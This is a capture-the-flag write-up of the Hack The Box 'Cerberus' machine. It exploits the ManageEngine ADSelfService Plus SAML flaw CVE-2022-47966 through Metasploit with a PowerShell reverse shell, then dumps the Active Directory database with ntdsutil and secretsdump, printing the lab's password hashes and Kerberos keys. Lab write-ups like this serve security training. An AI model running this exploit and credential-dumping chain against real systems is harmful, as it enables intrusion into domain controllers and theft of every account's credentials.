InfoSec LAB

Cerberus_Privilege_Escalation

Created: 10 min read

CVE-2022-47966

A vulnerability classified as problematic was found in zoho manageengine access manager plus, active directory 360, adaudit plus, admanager plus, adselfservice plus, analytics plus, application control plus, asset explorer, browser security plus, device control plus, endpoint central, endpoint central msp, endpoint dlp, key manager plus, os deployer, pam 360, password manager pro, patch manager plus, remote access plus, remote monitoring and management, servicedesk plus, servicedesk plus msp, supportcenter plus and vulnerability manager plus (Access Management Software). Affected by this vulnerability is an unknown part of the component Apache xmlsec. As an impact it is known to affect confidentiality, integrity, and availability.

ADSelfService Plus build 6210 is affected

The vulnerability has been actively exploited in the wild and cisa has been officially tracking it

Exploit

The exploit is available as a Metasploit module;

Additionally, I have come to conclusion that the original PoC DID NOT work after hours of trials and errors

Exploitation

┌──(kali㉿kali)-[~/archive/htb/labs/cerberus]
└─$ msfconsole -q
 
msf6 > search ADSelfService Plus SAML
 
Matching Modules
================
 
   #  Name                                                                        Disclosure Date  Rank       Check  Description
   -  ----                                                                        ---------------  ----       -----  -----------
   0  exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966  2023-01-10       excellent  Yes    ManageEngine ADSelfService Plus Unauthenticated SAML RCE
 
 
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966
 
msf6 > use 0
[*] Using configured payload cmd/windows/powershell/meterpreter/reverse_tcp

That’s the one; exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966 There are a few configurations to set;

  • guid:67a8d101690402dc6a6744b8fc8a7ca1acf88b2f
    • has been identified in both SAMLRequest and SAMLResponse
  • issuer_url:http://dc.cerberus.local/adfs/services/trust
    • has been identified in SAMLResponse
  • proxies:socks5:127.0.0.1:48823
  • rhosts:10.10.11.205
  • lhost:tun0
msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > set GUID 67a8d101690402dc6a6744b8fc8a7ca1acf88b2f
GUID => 67a8d101690402dc6a6744b8fc8a7ca1acf88b2f
msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > set issuer_url http://dc.cerberus.local/adfs/services/trust
issuer_url => http://dc.cerberus.local/adfs/services/trust
msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > set proxies socks5:127.0.0.1:48823
proxies => socks5:127.0.0.1:48823
msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > set RHOSTS 10.10.11.205
RHOSTS => 10.10.11.205
msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > set LHOST tun0
LHOST => tun0

Configuring accordingly

msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > set payload cmd/windows/powershell_reverse_tcp
payload => cmd/windows/powershell_reverse_tcp

I will also change the payload to cmd.exe-based

All Set

msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > run
 
[-] exploit failed: RuntimeError TCP connect-back payloads cannot be used with Proxies. Use 'set ReverseAllowProxy true' to override this behaviour.
[*] Exploit completed, but no session was created.

Initial exploit fails because of the configured payload does not support connect-back with SOCK5 overhead by default.

msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > set ReverseAllowProxy true
ReverseAllowProxy => true

This can be overridden with the following command; set ReverseAllowProxy true

msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > run
 
[*] started reverse tcp handler on 10.10.14.4:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] powershell session session 1 opened (10.10.14.4:4444 -> 10.10.11.205:56337) at 2024-01-18 14:49:46 +0100
 
ps c:\Program Files (x86)\ManageEngine\ADSelfService Plus\bin> whoami
nt authority\system
ps c:\Program Files (x86)\ManageEngine\ADSelfService Plus\bin> hostname
DC
ps c:\Program Files (x86)\ManageEngine\ADSelfService Plus\bin> ipconfig 
 
Windows IP Configuration
 
 
ethernet adapter vethernet (switch1):
 
   connection-specific dns suffix  . : 
   link-local ipv6 address . . . . . : fe80::e225:edaa:5112:dfc3%6
   ipv4 address. . . . . . . . . . . : 172.16.22.1
   subnet mask . . . . . . . . . . . : 255.255.255.240
   default gateway . . . . . . . . . : 
 
ethernet adapter ethernet0 3:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::138
   ipv6 address. . . . . . . . . . . : dead:beef::5da5:9378:505:b275
   link-local ipv6 address . . . . . : fe80::75bd:2eb2:491:40c1%5
   ipv4 address. . . . . . . . . . . : 10.10.11.205
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%5
                                       10.10.10.2

Success System Level Compromise

Hashdump

PS C:\tmp> powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
C:\Windows\system32\ntdsutil.exe: ac i ntds
Active instance set to "ntds".
C:\Windows\system32\ntdsutil.exe: ifm
ifm: create full c:\temp
Creating snapshot...
Snapshot set {f79a9d1a-c034-46ab-a505-80a7e095d819} generated successfully.
Snapshot {e6daecab-b29b-4b84-b5b3-3b3570a1279a} mounted as C:\$SNAP_202401180740_VOLUMEC$\
Snapshot {e6daecab-b29b-4b84-b5b3-3b3570a1279a} is already mounted.
Initiating DEFRAGMENTATION mode...
     Source Database: C:\$SNAP_202401180740_VOLUMEC$\Windows\NTDS\ntds.dit
     Target Database: c:\temp\Active Directory\ntds.dit
 
                  Defragmentation  Status (omplete)
 
          0    10   20   30   40   50   60   70   80   90  100
          |----|----|----|----|----|----|----|----|----|----|
          ...................................................
 
Copying registry files...
Copying c:\temp\registry\SYSTEM
Copying c:\temp\registry\SECURITY
Snapshot {e6daecab-b29b-4b84-b5b3-3b3570a1279a} unmounted.
IFM media created successfully in c:\temp
ifm: q
C:\Windows\system32\ntdsutil.exe: q

Dumping LSA secrets with the LOLBAS method via ntdsitil.exe

PS C:\tmp> Compress-Archive -Path C:\temp -DestinationPath .\archive.zip
PS C:\tmp> download C:\\tmp\\archive.zip ./archive.zip
[*] Download C:\tmp\archive.zip => ./archive.zip
[+] Done

Transferring the archive to Kali

┌──(kali㉿kali)-[~/…/labs/cerberus/CVE-2022-47966/LSA]
└─$ unzip archive.zip          
Archive:  archive.zip
warning:  archive.zip appears to use backslashes as path separators
  inflating: temp/Active Directory/ntds.dit  
  inflating: temp/Active Directory/ntds.jfm  
  inflating: temp/registry/SECURITY  
  inflating: temp/registry/SYSTEM

Inflating

┌──(kali㉿kali)-[~/…/labs/cerberus/CVE-2022-47966/LSA]
└─$ impacket-secretsdump local -ntds temp/Active\ Directory/ntds.dit -system temp/registry/SYSTEM -security temp/registry/SECURITY  1
Impacket v0.12.0.dev1+20231130.165011.d370e63 - Copyright 2023 Fortra
 
[*] Target system bootKey: 0xad7915b8e6d4f9ee383a5176349739e3
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:a25fb7291307abe5bc8ea71a5d26bcfe6c7871d66e6fec0adbaedea580b3b55938ce2a4d1bd4dafeb9400afb24a3b8b3d94d2f02e128f1826afb6669aa0fa9e4bc3b2a09787365030c39ee3fc491e5a28f4e890fc8c86dbb526f356b556b7d2c0f52506617b98aa7383ea800e078568130f757d9581eddad362e06777bc12d0ba70215b9e4d30fceb6a9489b42cec4324069386c743acdd81ecfd1d55587055c5c39c2aa21dd5cd0f9f2d1f1be0b70765bedbe8c966770234646c8a2047aff5ea313ac55a71833ea8f2ec749d826369044766c05bd1283e0f99439098c6c911590c76b015963102fe47bf8d928940400
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:811855bb4d66867881d93baf9460c8f1
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xee3ee8172d485d91d928e75a6199a2d9d1552d2a
dpapi_userkey:0x872350e7691cd1f10c04962e21f42f7921a64796
[*] NL$KM 
 0000   4D 9A AB A3 5A 7A 2F 50  25 FC 83 1A 10 FE 1E A5   M...Zz/P%.......
 0010   D3 B9 9D A8 B5 4E EB 60  2B D6 78 53 7B 73 2A E0   .....N.`+.xS{s*.
 0020   44 A8 77 0C 48 36 37 26  80 D0 2C 90 D4 16 AA E5   D.w.H67&..,.....
 0030   66 53 4B 7F A9 2D 50 99  8A 26 0A 20 40 0D 9B E1   fSK..-P..&. @...
NL$KM:4d9aaba35a7a2f5025fc831a10fe1ea5d3b99da8b54eeb602bd678537b732ae044a8770c4836372680d02c90d416aae566534b7fa92d50998a260a20400d9be1
[*] _SC_GMSA_DPAPI_{C6810348-4834-4a1e-817D-5838604E6004}_2e5ff7292180ef62bd5d4efea372684081709fa8afb3a32ad1e302ae1b176855 
 0000   EE 66 2F AB 44 BA 1C DD  F3 5C 5E 49 05 76 F3 5A   .f/.D....\^I.v.Z
 0010   47 D7 31 A4 CC 67 C5 F5  C1 D3 24 0A 3C F4 BD 91   G.1..g....$.<...
 0020   46 2B 49 A7 2B 65 ED B2  D5 1E F6 27 34 8A 97 9E   F+I.+e.....'4...
 0030   9F 1C F3 1E 8C 82 EC 0E  2B 04 5E 17 2A 0A 58 0F   ........+.^.*.X.
 0040   1C C3 1E E2 9C 0B 9B D2  50 94 50 B3 53 81 71 8D   ........P.P.S.q.
 0050   AD 9E E8 BF E3 09 8B 81  87 83 B8 3D 78 AA AE 0F   ...........=x...
 0060   E3 77 A4 D2 E7 59 40 70  36 81 D3 39 9F F3 C9 54   .w...Y@p6..9...T
 0070   21 E1 DB 84 F0 32 58 11  E8 0D 2A D2 44 3E 23 9D   !....2X...*.D>#.
 0080   A0 CC 32 C6 70 AD C7 C5  2E C9 88 F7 08 BF F1 48   ..2.p..........H
 0090   80 38 5F 25 0E ED 68 35  F7 DE EF 88 00 97 DC 69   .8_%..h5.......i
 00a0   8D 47 99 FD 07 F3 B4 58  C1 63 34 5C 22 46 00 D6   .G.....X.c4\"F..
 00b0   FD 22 42 1B 11 2C 32 F0  66 CA B2 E2 8F BA AC DA   ."B..,2.f.......
 00c0   13 8E C5 2A 82 6F 20 8A  4A 47 A2 79 27 D5 CC B2   ...*.o .JG.y'...
 00d0   89 22 48 21 8E 6C 43 3D  3D E8 5E 64 EC 31 46 0D   ."H!.lC==.^d.1F.
 00e0   47 EE 0F 23 9E B3 E5 43  49 C0 CF 70 D2 77 01 D0   G..#...CI..p.w..
_SC_GMSA_DPAPI_{C6810348-4834-4a1e-817D-5838604E6004}_2e5ff7292180ef62bd5d4efea372684081709fa8afb3a32ad1e302ae1b176855:ee662fab44ba1cddf35c5e490576f35a47d731a4cc67c5f5c1d3240a3cf4bd91462b49a72b65edb2d51ef627348a979e9f1cf31e8c82ec0e2b045e172a0a580f1cc31ee29c0b9bd2509450b35381718dad9ee8bfe3098b818783b83d78aaae0fe377a4d2e75940703681d3399ff3c95421e1db84f0325811e80d2ad2443e239da0cc32c670adc7c52ec988f708bff14880385f250eed6835f7deef880097dc698d4799fd07f3b458c163345c224600d6fd22421b112c32f066cab2e28fbaacda138ec52a826f208a4a47a27927d5ccb2892248218e6c433d3de85e64ec31460d47ee0f239eb3e54349c0cf70d27701d0
[*] _SC_GMSA_{84A78B8C-56EE-465b-8496-FFB35A1B52A7}_2e5ff7292180ef62bd5d4efea372684081709fa8afb3a32ad1e302ae1b176855 
 0000   01 00 00 00 24 02 00 00  10 00 12 01 14 02 1C 02   ....$...........
 0010   7F 32 B9 44 5E 45 88 C7  63 78 0B 4F 5F D0 E9 BF   .2.D^E..cx.O_...
 0020   CD 16 FB 75 18 01 29 1B  EE 14 2A 56 4E 3F 49 29   ...u..)...*VN?I)
 0030   29 F8 49 20 DE 20 18 C4  66 96 CD 72 13 23 E6 A8   ).I . ..f..r.#..
 0040   44 F2 A2 AE A4 73 4B E1  DA 5B 1F EB DE 4A 6E E8   D....sK..[...Jn.
 0050   70 67 0C E5 30 26 C6 CC  F7 12 E9 80 60 0F EF 14   pg..0&......`...
 0060   53 2B B4 2D 66 4C 0D BE  30 4F 94 24 A2 48 A2 65   S+.-fL..0O.$.H.e
 0070   72 A3 F1 47 8F 2C B7 20  71 60 C5 34 D5 54 8F 18   r..G.,. q`.4.T..
 0080   57 41 86 97 23 58 3F 32  7A 4C DB 3F 30 1F 1E C6   WA..#X?2zL.?0...
 0090   54 AA 5B 0E E9 BB A2 E0  B7 13 75 DB 56 07 81 8C   T.[.......u.V...
 00a0   76 6D D4 C1 E5 CD 48 E6  40 5C 7E E2 7C 6B D7 26   vm....H.@\~.|k.&
 00b0   E5 80 2F A3 BD 0D A5 4C  84 70 91 D9 98 33 14 A6   ../....L.p...3..
 00c0   15 DF F5 AE DA 4B 1B 2E  A3 6D 2D 0F CD 14 FB 9E   .....K...m-.....
 00d0   0E 0B B8 65 FB 5D 85 8D  CF 05 6E A2 59 BD 72 D6   ...e.]....n.Y.r.
 00e0   D5 66 98 ED 86 B7 03 CB  D5 14 8D 5A 64 02 D8 9C   .f.........Zd...
 00f0   D8 DD 24 9D D4 D6 1A 79  C8 98 D3 2E 24 0B D6 C5   ..$....y....$...
 0100   83 5E 28 48 33 A3 FA 38  2E 9C 72 D0 46 A3 37 AF   .^(H3..8..r.F.7.
 0110   00 00 88 28 43 61 90 4F  37 B3 85 EF 16 B4 C8 CB   ...(Ca.O7.......
 0120   0B F6 F8 D6 78 5E 4F F0  D9 7D 65 19 CA 23 F5 C4   ....x^O..}e..#..
 0130   15 80 A2 F2 3F 94 D0 4E  4E FF E4 5D E5 29 DD E2   ....?..NN..].)..
 0140   3D 64 90 6F 0E A8 21 7E  31 93 EE 47 B8 F8 A6 91   =d.o..!~1..G....
 0150   1B 96 13 0C 21 E8 CA 72  A0 AD D0 24 4A 04 0C 6C   ....!..r...$J..l
 0160   D9 A4 E5 A3 F8 38 2A 9A  E2 2C F0 40 7D 67 82 CD   .....8*..,.@}g..
 0170   16 8E 37 C9 13 5B C7 19  66 30 85 CF 63 06 07 F7   ..7..[..f0..c...
 0180   07 D6 5A 45 AC 55 09 C4  B3 E4 D0 CE 2D 30 81 E4   ..ZE.U......-0..
 0190   53 42 9C 4D FA 94 3F 0E  77 0E C3 C9 62 5E B8 7A   SB.M..?.w...b^.z
 01a0   E0 ED BE FB D4 EB F5 74  6E D4 D6 93 53 D0 51 8C   .......tn...S.Q.
 01b0   A8 F6 2D D1 A7 82 FB EE  1B 85 FA 60 98 40 E8 E0   ..-........`.@..
 01c0   7C 3B C7 69 CA 41 B6 02  B7 09 36 F3 27 8A 26 2C   |;.i.A....6.'.&,
 01d0   5A A2 5D DE 01 28 DC 5F  E8 59 06 85 F9 64 52 FD   Z.]..(._.Y...dR.
 01e0   59 5D 47 E3 8A 2B 9F 8B  95 F3 1C 3B E0 CC FC B7   Y]G..+.....;....
 01f0   7C 75 66 41 22 64 F5 34  75 E7 A8 B8 09 94 5F FD   |ufA"d.4u....._.
 0200   1A 47 EE 53 FE 6E CB D9  F1 CF A1 CB BF 3C 29 1E   .G.S.n.......<).
 0210   77 D6 00 00 41 8A A4 C3  50 05 00 00 41 2C D4 10   w...A...P...A,..
 0220   50 05 00 00                                        P...
_SC_GMSA_{84A78B8C-56EE-465b-8496-FFB35A1B52A7}_2e5ff7292180ef62bd5d4efea372684081709fa8afb3a32ad1e302ae1b176855:01000000240200001000120114021c027f32b9445e4588c763780b4f5fd0e9bfcd16fb751801291bee142a564e3f492929f84920de2018c46696cd721323e6a844f2a2aea4734be1da5b1febde4a6ee870670ce53026c6ccf712e980600fef14532bb42d664c0dbe304f9424a248a26572a3f1478f2cb7207160c534d5548f185741869723583f327a4cdb3f301f1ec654aa5b0ee9bba2e0b71375db5607818c766dd4c1e5cd48e6405c7ee27c6bd726e5802fa3bd0da54c847091d9983314a615dff5aeda4b1b2ea36d2d0fcd14fb9e0e0bb865fb5d858dcf056ea259bd72d6d56698ed86b703cbd5148d5a6402d89cd8dd249dd4d61a79c898d32e240bd6c5835e284833a3fa382e9c72d046a337af000088284361904f37b385ef16b4c8cb0bf6f8d6785e4ff0d97d6519ca23f5c41580a2f23f94d04e4effe45de529dde23d64906f0ea8217e3193ee47b8f8a6911b96130c21e8ca72a0add0244a040c6cd9a4e5a3f8382a9ae22cf0407d6782cd168e37c9135bc719663085cf630607f707d65a45ac5509c4b3e4d0ce2d3081e453429c4dfa943f0e770ec3c9625eb87ae0edbefbd4ebf5746ed4d69353d0518ca8f62dd1a782fbee1b85fa609840e8e07c3bc769ca41b602b70936f3278a262c5aa25dde0128dc5fe8590685f96452fd595d47e38a2b9f8b95f31c3be0ccfcb77c7566412264f53475e7a8b809945ffd1a47ee53fe6ecbd9f1cfa1cbbf3c291e77d60000418aa4c350050000412cd41050050000
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: caf4762be59b79e7f2a74756cb1a11fe
[*] Reading and decrypting hashes from temp/Active Directory/ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:91ff0fb948167eb4d080b5330686c02f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:811855bb4d66867881d93baf9460c8f1:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d2e82d4f77310a49973793ee986b6490:::
cerberus.local\matthew:1104:aad3b435b51404eeaad3b435b51404ee:bcd285980e1d9b302e16875844ef6977:::
adfs_svc$:5602:aad3b435b51404eeaad3b435b51404ee:c6c1d3757fb38790d16e9678f474a295:::
ICINGA$:9102:aad3b435b51404eeaad3b435b51404ee:af70cf6b33f1cce788138d459f676faf:::
[*] Kerberos keys from temp/Active Directory/ntds.dit 
Administrator:aes256-cts-hmac-sha1-96:70a856da8ada6efe4fdec36b26b2b29869aaf4829d049db5de56a1e30f47aa58
Administrator:aes128-cts-hmac-sha1-96:7a84f5d0f21a4752b09642bd79202721
Administrator:des-cbc-md5:9eef4fb597d93419
DC$:aes256-cts-hmac-sha1-96:6633a17b72a964b119ab22ed482ade0fe6a828c4a64cb11deb11f5838e00746a
DC$:aes128-cts-hmac-sha1-96:186c9eb1ec9e8a12fa7c5a81c3feb632
DC$:des-cbc-md5:6bc1c762c4a7a126
krbtgt:aes256-cts-hmac-sha1-96:afca4e9993e4015f8c3acb6d481375213ae34779181028f049ce1005bab5bebc
krbtgt:aes128-cts-hmac-sha1-96:6bdcee151a166edcd3bbb9b67bf5dd63
krbtgt:des-cbc-md5:79267ce9a45d4546
cerberus.local\matthew:aes256-cts-hmac-sha1-96:5d71167dd6247cc3032c35bceda41f5c5783d3f3df94a43d933221cf4149cd8f
cerberus.local\matthew:aes128-cts-hmac-sha1-96:b5abf06c48f0bb78814cfc9bcbcdeed8
cerberus.local\matthew:des-cbc-md5:76c78092b6aee649
adfs_svc$:aes256-cts-hmac-sha1-96:7ee49afad92c71eed6f66c2a7a17080a7a1f69483b41cd44e77bac5205047701
adfs_svc$:aes128-cts-hmac-sha1-96:50f6f266698a03c1d27fa4be43f8a7f2
adfs_svc$:des-cbc-md5:76c151a4e062e6a8
ICINGA$:aes256-cts-hmac-sha1-96:38df579da95520b9489e85a22aec9d3ca4916d5b9a37ff6f0ecda8eec992479f
ICINGA$:aes128-cts-hmac-sha1-96:1241a65425ce5c7a0f06be09e8217274
ICINGA$:des-cbc-md5:0858ad94ef67b916
[*] Cleaning up...

Domain Level Compromise

Interactive Graph View

Backlinks